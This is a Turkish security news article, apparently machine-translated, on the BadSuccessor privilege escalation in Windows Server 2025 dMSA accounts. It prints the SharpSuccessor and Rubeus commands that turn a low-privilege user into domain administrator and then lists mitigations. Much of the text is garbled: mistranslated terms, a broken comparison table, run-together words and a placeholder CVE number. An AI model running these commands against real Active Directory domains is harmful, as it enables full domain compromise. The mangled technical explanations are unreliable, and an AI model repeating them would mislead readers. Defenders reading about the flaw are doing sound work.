Windows Server 2025’in delege Yönetilen Hizmet Hesabı (DMSA) özelliğindeki kritik bir ayrıcalık artış güvenlik açığı, saldırganların Sharpsuccessor gibi araçları kullanarak Active Directory etki alanlarından ödün vermesini sağlar.
Bu saldırı zinciri, düşük ayrıcalıklı kullanıcıları kötüye kullanılabilir bir Kerberos bilet manipülasyonu yoluyla alan adı yöneticilerine dönüştürmek için varsayılan yapılandırmalardan yararlanır.
Aşağıda, teknik mekaniği, silahlandırma sürecini ve savunma karşı önlemlerini bozuyoruz.
.png
)
1. Kötüsör kırılganlığının anatomisi
Güvenlik açığı (CVE-2025-XXXX), msDS-ManagedAccountPrecededByLink DMSA Geçişi sırasında öznitelik.
Bu öznitelik, bir DMSA’nın, idari haklar gerektirmeden herhangi bir bağlantılı hesaptan ayrıcalıkları devralmasına izin verir.
Saldırganlar Createchild Herhangi bir Organizasyon Birimi (OU) için izinler şunları
- Kötü niyetli bir DMSA nesnesi oluştur
- Dövmek
msDS-ManagedAccountPrecededByLinkYüksek değerli hedeflere referansa atıf (örn. Domain yöneticileri) - Tetikleyici Kerberos Bilet Verme Bileti (TGT) Sahtekarlık kimliği için ihraç
Anahtar Dağıtım Merkezi (KDC), DMSA’ya Hizmet Ana Adı (SPN) çözünürlüğü ve bilet şifrelemesini otomatik olarak verir ve sınırsız yanal hareket sağlar
2. Sharpsuccessor Silahlaşma İş Akışı
Sharpsuccessor, üç aşamalı bir süreçle sömürü otomatikleştirir:
Aşama 1: DMSA Nesne Oluşturma
powershellSharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA
Bu komut bir DMSA oluşturur (attacker_dMSA) Yönetici hesabına bağlı, tehlikeye atılan kullanıcıyı kullanarak jdoe‘S Createchild üzerindeki haklar ou=test VEYA.
Aşama 2: Kerberos bilet manipülasyonu
powershellRubeus.exe tgtdeleg /nowrap
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt
tgtdelegGeçerli kullanıcı için bir TGT ister (jdoe)asktgsDMSA hesabını taklit ederek yöneticiye dövme bağlantısını kullanır
Aşama 3: Etki Adı Uzlaşması
powershellRubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt
Bu son komut, etki alanı denetleyicisinin SMB hizmetine erişim sağlar (cifs/), kimlik bileti hasat veya altın bilet oluşturma için bilet geçiş saldırıları sağlar.
3. Azaltma Stratejileri ve DMSA Sertleştirme
| Özellik | GMSA | DMSA (ön planlama) |
|---|---|---|
| Auth Auth Midciation | Alan çapında | Makineye özgü |
| Priv Esc Riskleri | Kerberoasting | Öznitelik Kaçma (Badsuccessor) |
| Gizli depolama | AD’de otomatik rotasyon | Kimlik bilgisi ile makineye bağlı |
Azaltmak için:
- Kısıtlama veya izinler: Denetim
CreateChildPowerShell Kullanarak Haklar: PowerShellGet-ADOrganizationalUnit -Filter * | Get-ADObject -Properties nTSecurityDescriptor - Blok Öznitelik Değişiklikleri: Yazma erişimini reddet
msDS-ManagedAccountPrecededByLinkİkiz edici olmayanlar için - Kimlik Bilgisi Korumasını Etkinleştir: Bilet hırsızlığını önlemek için DMSA için makineye bağlı kimlik doğrulamasını uygulayın
Microsoft sorunu kabul etti, ancak henüz bir yama yayınlamadı. Windows Server 2025’i kullanan kuruluşlar, etki alanı çapında uzlaşmayı önlemek için bu hafifletmeye öncelik vermelidir.
Bu saldırı, aşırı izin veren izinlerin risklerini ve AD öznitelik değişikliklerinin yetersiz validasyonunun altını çizmektedir.
Sharpsuccessor’un otomasyonunu Kerberos protokolü zayıflıklarıyla birleştirerek, saldırganlar tam alan kontrolü minimum çaba ile elde ederler.
DMSA nesnelerinin sürekli olarak izlenmesi ve en az ayrıcalık ilkelerine sıkı sıkıya bağlı kalma kritik savunmalar olmaya devam etmektedir.
Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!